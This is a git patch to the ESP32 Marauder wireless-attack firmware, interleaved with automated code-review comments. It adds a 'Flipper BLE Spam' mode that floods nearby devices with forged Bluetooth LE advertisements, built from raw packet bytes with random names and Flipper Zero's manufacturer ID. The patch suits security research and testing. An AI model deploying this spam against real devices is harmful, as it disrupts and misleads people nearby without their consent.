From 9b59b7f8c06ad7d812ec6228348db2e1eeeadc37 Mon Sep 17 00:00:00 2001 From: Just Call Me Koko Date: Wed, 13 Nov 2024 17:34:41 -0500 Subject: [PATCH] Add flipper ble spam --- esp32_marauder/CommandLine.cpp | 12 +++++ esp32_marauder/CommandLine.h | 2 +- esp32_marauder/GpsInterface.cpp | 2 +- esp32_marauder/LedInterface.cpp | 2 +- esp32_marauder/MenuFunctions.cpp | 9 +++- esp32_marauder/WiFiScan.cpp | 76 ++++++++++++++++++++++++++++++- esp32_marauder/WiFiScan.h | 5 +- esp32_marauder/configs.h | 6 +-- esp32_marauder/esp32_marauder.ino | 52 ++++++++++----------- 9 files changed, 130 insertions(+), 36 deletions(-) diff --git a/esp32_marauder/CommandLine.cpp b/esp32_marauder/CommandLine.cpp index 74355e5..9d69730 100644 --- a/esp32_marauder/CommandLine.cpp +++ b/esp32_marauder/CommandLine.cpp @@ -909,6 +909,18 @@ void CommandLine::runCommand(String input) { Serial.println("Bluetooth not supported"); #endif } + else if (bt_type == "flipper") { + #ifdef HAS_BT + Serial.println("Starting Flipper Spam attack. Stop with " + (String)STOPSCAN_CMD); + #ifdef HAS_SCREEN + display_obj.clearScreen(); + menu_function_obj.drawStatusBar(); + #endif + wifi_scan_obj.StartScan(BT_ATTACK_FLIPPER_SPAM, TFT_ORANGE); + #else + Serial.println("Bluetooth not supported"); + #endif + } else if (bt_type == "all") { #ifdef HAS_BT Serial.println("Starting BT Spam All attack. Stop with " + (String)STOPSCAN_CMD); diff --git a/esp32_marauder/CommandLine.h b/esp32_marauder/CommandLine.h index c6be7e0..da0698f 100644 --- a/esp32_marauder/CommandLine.h +++ b/esp32_marauder/CommandLine.h 
@@ -135,7 +135,7 @@ const char PROGMEM HELP_LOAD_CMD[] = "load -a/-s"; // Bluetooth sniff/scan const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt"; -const char PROGMEM HELP_BT_SPAM_CMD[] = "blespam -t "; +const char PROGMEM HELP_BT_SPAM_CMD[] = "blespam -t "; //const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple"; //const char PROGMEM HELP_BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair"; //const char PROGMEM HELP_BT_SAMSUNG_SPAM_CMD[] = "samsungblespam"; diff --git a/esp32_marauder/GpsInterface.cpp b/esp32_marauder/GpsInterface.cpp index 370c37f..131253d 100644 --- a/esp32_marauder/GpsInterface.cpp +++ b/esp32_marauder/GpsInterface.cpp @@ -32,7 +32,7 @@ void GpsInterface::begin() { MicroNMEA::sendSentence(Serial2, "$PSTMSRR"); - delay(3900); + delay(1900); if (Serial2.available()) { Serial.println("GPS Attached Successfully"); diff --git a/esp32_marauder/LedInterface.cpp b/esp32_marauder/LedInterface.cpp index be97b66..bff8864 100644 --- a/esp32_marauder/LedInterface.cpp +++ b/esp32_marauder/LedInterface.cpp @@ -10,7 +10,7 @@ void LedInterface::RunSetup() { strip.begin(); strip.setPixelColor(0, strip.Color(0, 0, 0)); strip.show(); - delay(100); + //delay(100); strip.setBrightness(50); strip.setPixelColor(0, strip.Color(0, 0, 0)); strip.show(); diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp index ba4b8b9..e20284f 100644 --- a/esp32_marauder/MenuFunctions.cpp +++ b/esp32_marauder/MenuFunctions.cpp @@ -590,6 +590,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == BT_ATTACK_SPAM_ALL) || (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) || + (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS)) 
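Review bot: In GpsInterface.cpp the fixed wait before the `Serial2.available()` check drops from `delay(3900)` to `delay(1900)` with no comment on why the shorter value is enough, and the change is unrelated to the BLE feature named in the commit title. A module that answers `$PSTMSRR` later than 1.9 s would presumably now be reported as not attached. Replace the literal with a named constant and document the assumption, e.g. `// longest time a supported module needs to answer $PSTMSRR`. `GpsInterface::begin()` continues outside the hunk, so the effect on the rest of the detection logic is not visible here.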
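Review bot: `BT_ATTACK_FLIPPER_SPAM` is added by hand to the `currentScanMode == ...` chain in `MenuFunctions::main` here, again in the `@@ -654` hunk of this file, and in `StartScan`, `StopScan` and `WiFiScan::main` in WiFiScan.cpp. If a future mode misses the `StopScan` or menu chain, the radio mode could be started without the matching stop/exit path. The chains are not identical, but the BLE-spam subset repeats in each one, so a single predicate such as `static bool isBleSpamMode(uint8_t mode)` on `WiFiScan` (name illustrative) would give new modes one place to register. The enclosing condition begins and ends outside the hunk.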
@@ -654,6 +655,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == BT_ATTACK_SPAM_ALL) || (wifi_scan_obj.currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (wifi_scan_obj.currentScanMode == BT_ATTACK_GOOGLE_SPAM) || + (wifi_scan_obj.currentScanMode == BT_ATTACK_FLIPPER_SPAM) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) || @@ -1879,7 +1881,12 @@ void MenuFunctions::RunSetup() this->addNodes(&bluetoothAttackMenu, "Google BLE Spam", TFT_PURPLE, NULL, LANGUAGE, [this]() { display_obj.clearScreen(); this->drawStatusBar(); - wifi_scan_obj.StartScan(BT_ATTACK_GOOGLE_SPAM, TFT_RED); + wifi_scan_obj.StartScan(BT_ATTACK_GOOGLE_SPAM, TFT_PURPLE); + }); + this->addNodes(&bluetoothAttackMenu, "Flipper BLE Spam", TFT_ORANGE, NULL, LANGUAGE, [this]() { + display_obj.clearScreen(); + this->drawStatusBar(); + wifi_scan_obj.StartScan(BT_ATTACK_FLIPPER_SPAM, TFT_ORANGE); }); this->addNodes(&bluetoothAttackMenu, "BLE Spam All", TFT_MAGENTA, NULL, DEAUTH_SNIFF, [this]() { display_obj.clearScreen(); diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp index 148ccf7..4fb80ee 100644 --- a/esp32_marauder/WiFiScan.cpp +++ b/esp32_marauder/WiFiScan.cpp 
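Review bot: In the `@@ -1879` hunk of `MenuFunctions::RunSetup`, the first changed line switches the existing Google entry from `StartScan(BT_ATTACK_GOOGLE_SPAM, TFT_RED)` to `TFT_PURPLE`. This changes an existing menu item and is not mentioned in the commit message. If it is a deliberate fix to match the node colour, note it in the description or split it out; otherwise revert it. The three added lambdas repeat the same `clearScreen(); drawStatusBar(); StartScan(...)` body, which a small private helper taking the mode and colour would remove. `RunSetup` starts and ends outside the hunk.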
@@ -126,6 +126,55 @@ extern "C" { AdvData.addData(std::string((char *)AdvData_Raw, 14)); break; } + case FlipperZero: { + // Generate a random 5-letter name for the advertisement + char Name[6]; // 5 characters + null terminator + generateRandomName(Name, sizeof(Name)); + + uint8_t name_len = strlen(Name); + + // Allocate space for the full Advertisement Data section based on the hex dump + AdvData_Raw = new uint8_t[31]; // Adjusted to the specific length of the data in the dump + + // Advertisement Data from the hex dump + AdvData_Raw[i++] = 0x02; // Flags length + AdvData_Raw[i++] = 0x01; // Flags type + AdvData_Raw[i++] = 0x06; // Flags value + + AdvData_Raw[i++] = 0x06; // Name length (5 + type) + AdvData_Raw[i++] = 0x09; // Complete Local Name type + + // Add the randomized 5-letter name + memcpy(&AdvData_Raw[i], Name, name_len); + i += name_len; + + AdvData_Raw[i++] = 0x03; // Incomplete List of 16-bit Service UUIDs length + AdvData_Raw[i++] = 0x02; // Incomplete List of 16-bit Service UUIDs type + AdvData_Raw[i++] = 0x81; // Service UUID (part of hex dump) + AdvData_Raw[i++] = 0x30; + + AdvData_Raw[i++] = 0x02; // TX Power level length + AdvData_Raw[i++] = 0x0A; // TX Power level type + AdvData_Raw[i++] = 0x00; // TX Power level value + + // Manufacturer specific data based on your hex dump + AdvData_Raw[i++] = 0x05; // Length of Manufacturer Specific Data section + AdvData_Raw[i++] = 0xFF; // Manufacturer Specific Data type + AdvData_Raw[i++] = 0xBA; // LSB of Manufacturer ID (Flipper Zero: 0x0FBA) + AdvData_Raw[i++] = 0x0F; // MSB of Manufacturer ID + + AdvData_Raw[i++] = 0x4C; // Example data (remaining as in your dump) + AdvData_Raw[i++] = 0x75; + AdvData_Raw[i++] = 0x67; + AdvData_Raw[i++] = 0x26; + AdvData_Raw[i++] = 0xE1; + AdvData_Raw[i++] = 0x80; + + // Add the constructed Advertisement Data to the BLE advertisement + AdvData.addData(std::string((char *)AdvData_Raw, i)); + + break; + } default: { Serial.println("Please Provide a Company Type"); 
break; @@ -578,7 +627,8 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color) else if ((scan_mode == BT_ATTACK_SWIFTPAIR_SPAM) || (scan_mode == BT_ATTACK_SPAM_ALL) || (scan_mode == BT_ATTACK_SAMSUNG_SPAM) || - (scan_mode == BT_ATTACK_GOOGLE_SPAM)) { + (scan_mode == BT_ATTACK_GOOGLE_SPAM) || + (scan_mode == BT_ATTACK_FLIPPER_SPAM)) { #ifdef HAS_BT RunSwiftpairSpam(scan_mode, color); #endif @@ -764,6 +814,7 @@ void WiFiScan::StopScan(uint8_t scan_mode) (currentScanMode == BT_ATTACK_SPAM_ALL) || (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || (currentScanMode == BT_ATTACK_GOOGLE_SPAM) || + (currentScanMode == BT_ATTACK_FLIPPER_SPAM) || (currentScanMode == BT_SCAN_WAR_DRIVE) || (currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (currentScanMode == BT_SCAN_SKIMMERS)) @@ -1890,6 +1941,19 @@ void WiFiScan::executeSourApple() { #endif } +void WiFiScan::generateRandomName(char *name, size_t length) { + static const char alphabet[] = "abcdefghijklmnopqrstuvwxyz"; + + // Generate the first character as uppercase + name[0] = 'A' + (rand() % 26); + + // Generate the remaining characters as lowercase + for (size_t i = 1; i < length - 1; ++i) { + name[i] = alphabet[rand() % (sizeof(alphabet) - 1)]; + } + name[length - 1] = '\0'; // Null-terminate the string +} + const char* WiFiScan::generateRandomName() { const char* charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; int len = rand() % 10 + 1; // Generate a random length between 1 and 10 @@ -2321,6 +2385,8 @@ void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) { display_obj.tft.drawCentreString("BLE Spam Samsung",120,16,2); else if (scan_mode == BT_ATTACK_GOOGLE_SPAM) display_obj.tft.drawCentreString("BLE Spam Google",120,16,2); + else if (scan_mode == BT_ATTACK_FLIPPER_SPAM) + display_obj.tft.drawCentreString("BLE Spam Flipper", 120, 16, 2); display_obj.touchToExit(); #endif display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK); 
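Review bot: The new `FlipperZero` case allocates `AdvData_Raw = new uint8_t[31]` and no `delete[]` is visible in the `@@ -126` hunk. Unless the enclosing function frees the buffer after the `switch`, which lies outside the hunk, each call leaks 31 bytes on a heap-constrained MCU. The write index `i` is also never checked against the allocation: 27 bytes are written today, but the total depends on `strlen(Name)` while the length byte before it is the literal `0x06`. Since the size is a fixed maximum, a stack buffer plus a bound check before `addData`, such as `if (i > 31) { break; }` against a named constant, would make both properties local and obvious. `i` is assumed to be initialised to 0 before the `switch`; please confirm.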
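Review bot: `WiFiScan::generateRandomName(char *name, size_t length)` in the `@@ -1890` hunk writes `name[0]` and `name[length - 1]` without validating `length`. A call with `length == 0` writes out of bounds, and the loop bound `length - 1` wraps to `SIZE_MAX`. Add `if (name == nullptr || length == 0) return;` as the first statement. The only caller visible in this patch passes `sizeof(Name)` (6), so this is a latent defect rather than a live one. A short doc comment stating that `length` is the buffer size including the terminator would also help, because the existing no-argument `generateRandomName()` overload returns a string of a different shape.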
@@ -4666,7 +4732,8 @@ void WiFiScan::main(uint32_t currentTime) (currentScanMode == BT_ATTACK_SOUR_APPLE) || (currentScanMode == BT_ATTACK_SPAM_ALL) || (currentScanMode == BT_ATTACK_SAMSUNG_SPAM) || - (currentScanMode == BT_ATTACK_GOOGLE_SPAM)) { + (currentScanMode == BT_ATTACK_GOOGLE_SPAM) || + (currentScanMode == BT_ATTACK_FLIPPER_SPAM)) { #ifdef HAS_BT if (currentTime - initTime >= 1000) { initTime = millis(); @@ -4693,10 +4760,15 @@ void WiFiScan::main(uint32_t currentTime) if ((currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) || (currentScanMode == BT_ATTACK_SPAM_ALL)) this->executeSwiftpairSpam(Microsoft); + //this->executeSwiftpairSpam(FlipperZero); if ((currentScanMode == BT_ATTACK_SOUR_APPLE) || (currentScanMode == BT_ATTACK_SPAM_ALL)) this->executeSourApple(); + + if ((currentScanMode == BT_ATTACK_FLIPPER_SPAM) || + (currentScanMode == BT_ATTACK_SPAM_ALL)) + this->executeSwiftpairSpam(FlipperZero); #endif } else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) { diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h index 5b5ec60..eb7740a 100644 --- a/esp32_marauder/WiFiScan.h +++ b/esp32_marauder/WiFiScan.h @@ -92,6 +92,7 @@ #define BT_ATTACK_SAMSUNG_SPAM 39 #define WIFI_SCAN_GPS_NMEA 40 #define BT_ATTACK_GOOGLE_SPAM 41 +#define BT_ATTACK_FLIPPER_SPAM 42 #define GRAPH_REFRESH 100 @@ -262,7 +263,8 @@ class WiFiScan Microsoft, Apple, Samsung, - Google + Google, + FlipperZero }; #ifdef HAS_BT @@ -294,6 +296,7 @@ class WiFiScan void executeSwiftpairSpam(EBLEPayloadType type); void startWardriverWiFi(); void generateRandomMac(uint8_t* mac); + void generateRandomName(char *name, size_t length); void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string); diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h index 87b0440..a752223 100644 --- a/esp32_marauder/configs.h +++ b/esp32_marauder/configs.h 
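Review bot: In the `@@ -4693` hunk of `WiFiScan::main`, the added `//this->executeSwiftpairSpam(FlipperZero);` is dead code placed directly under the unbraced `if` that calls `executeSwiftpairSpam(Microsoft)`. It reads as if it belonged to that condition, and the real call is added a few lines below. Delete the commented line and consider bracing these single-statement `if`s. The new condition also includes `BT_ATTACK_SPAM_ALL`, so the existing "all" mode changes behaviour in this commit, which the commit message should state. The surrounding `if`/`else if` chain starts and ends outside the hunk.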
@@ -8,9 +8,9 @@ //// BOARD TARGETS //#define MARAUDER_M5STICKC - //#define MARAUDER_MINI + #define MARAUDER_MINI //#define MARAUDER_V4 - #define MARAUDER_V6 + //#define MARAUDER_V6 //#define MARAUDER_V6_1 //#define MARAUDER_KIT //#define GENERIC_ESP32 @@ -21,7 +21,7 @@ //#define MARAUDER_REV_FEATHER //// END BOARD TARGETS - #define MARAUDER_VERSION "v1.0.0" + #define MARAUDER_VERSION "v1.1.0" //// HARDWARE NAMES #ifdef MARAUDER_M5STICKC diff --git a/esp32_marauder/esp32_marauder.ino b/esp32_marauder/esp32_marauder.ino index ac6ae81..d9356c0 100644 --- a/esp32_marauder/esp32_marauder.ino +++ b/esp32_marauder/esp32_marauder.ino @@ -212,7 +212,7 @@ void setup() backlightOn(); // Need this #ifdef HAS_SCREEN - delay(2000); + //delay(2000); // Do some stealth mode stuff #ifdef HAS_BUTTONS 
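Review bot: The first configs.h hunk changes the default board target from `#define MARAUDER_V6` to `#define MARAUDER_MINI`, which looks like a local build selection committed together with the feature. Anyone building this revision for a V6 board would get the Mini's hardware configuration unless they edit the file first. If the new default is intentional, say so in the commit message; otherwise restore `#define MARAUDER_V6` and re-comment `//#define MARAUDER_MINI`. Passing the target as a build flag would keep this file out of feature commits.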
@@ -225,40 +225,40 @@ void setup() } #endif - display_obj.clearScreen(); + //display_obj.clearScreen(); - display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK); + //display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK); - display_obj.tft.println(text_table0[0]); + //display_obj.tft.println(text_table0[0]); - delay(2000); + //delay(2000); - display_obj.tft.println("Marauder " + display_obj.version_number + "\n"); + //display_obj.tft.println("Marauder " + display_obj.version_number + "\n"); - display_obj.tft.println(text_table0[1]); + //display_obj.tft.println(text_table0[1]); #endif settings_obj.begin(); wifi_scan_obj.RunSetup(); - #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[2])); - #endif + //#ifdef HAS_SCREEN + // display_obj.tft.println(F(text_table0[2])); + //#endif buffer_obj = Buffer(); #if defined(HAS_SD) // Do some SD stuff if(sd_obj.initSD()) { #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[3])); + //display_obj.tft.println(F(text_table0[3])); #endif } else { Serial.println(F("SD Card NOT Supported")); #ifdef HAS_SCREEN - display_obj.tft.setTextColor(TFT_RED, TFT_BLACK); - display_obj.tft.println(F(text_table0[4])); - display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK); + //display_obj.tft.setTextColor(TFT_RED, TFT_BLACK); + //display_obj.tft.println(F(text_table0[4])); + //display_obj.tft.setTextColor(TFT_CYAN, TFT_BLACK); #endif } #endif @@ -270,11 +270,11 @@ void setup() #endif #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[5])); + //display_obj.tft.println(F(text_table0[5])); #endif #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[6])); + //display_obj.tft.println(F(text_table0[6])); #endif #ifdef HAS_BATTERY 
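Review bot: The boot-screen output in `setup()` is disabled by commenting lines out rather than removing them, here and in the `@@ -212`, `@@ -270` and `@@ -293` hunks. This leaves several `#ifdef HAS_SCREEN` blocks containing only comments, and the SD-failure branch now reports `SD Card NOT Supported` on Serial only. A user with a screen and no serial console therefore gets no indication that SD initialisation failed. Either delete the lines outright or gate them behind one compile-time option (for example a new `SHOW_BOOT_LOG` define, name illustrative) and keep at least the failure message on screen. This is also unrelated to the BLE change in the commit title and would be easier to review as its own commit.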
@@ -293,27 +293,27 @@ void setup() #endif #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[7])); + //display_obj.tft.println(F(text_table0[7])); - delay(500); + //delay(500); #endif #ifdef HAS_GPS gps_obj.begin(); - #ifdef HAS_SCREEN - if (gps_obj.getGpsModuleStatus()) - display_obj.tft.println("GPS Module connected"); - else - display_obj.tft.println("GPS Module NOT connected"); - #endif + //#ifdef HAS_SCREEN + //if (gps_obj.getGpsModuleStatus()) + //display_obj.tft.println("GPS Module connected"); + //else + //display_obj.tft.println("GPS Module NOT connected"); + //#endif #endif #ifdef HAS_SCREEN - display_obj.tft.println(F(text_table0[8])); + //display_obj.tft.println(F(text_table0[8])); display_obj.tft.setTextColor(TFT_WHITE, TFT_BLACK); - delay(2000); + //delay(2000); #endif #ifdef HAS_SCREEN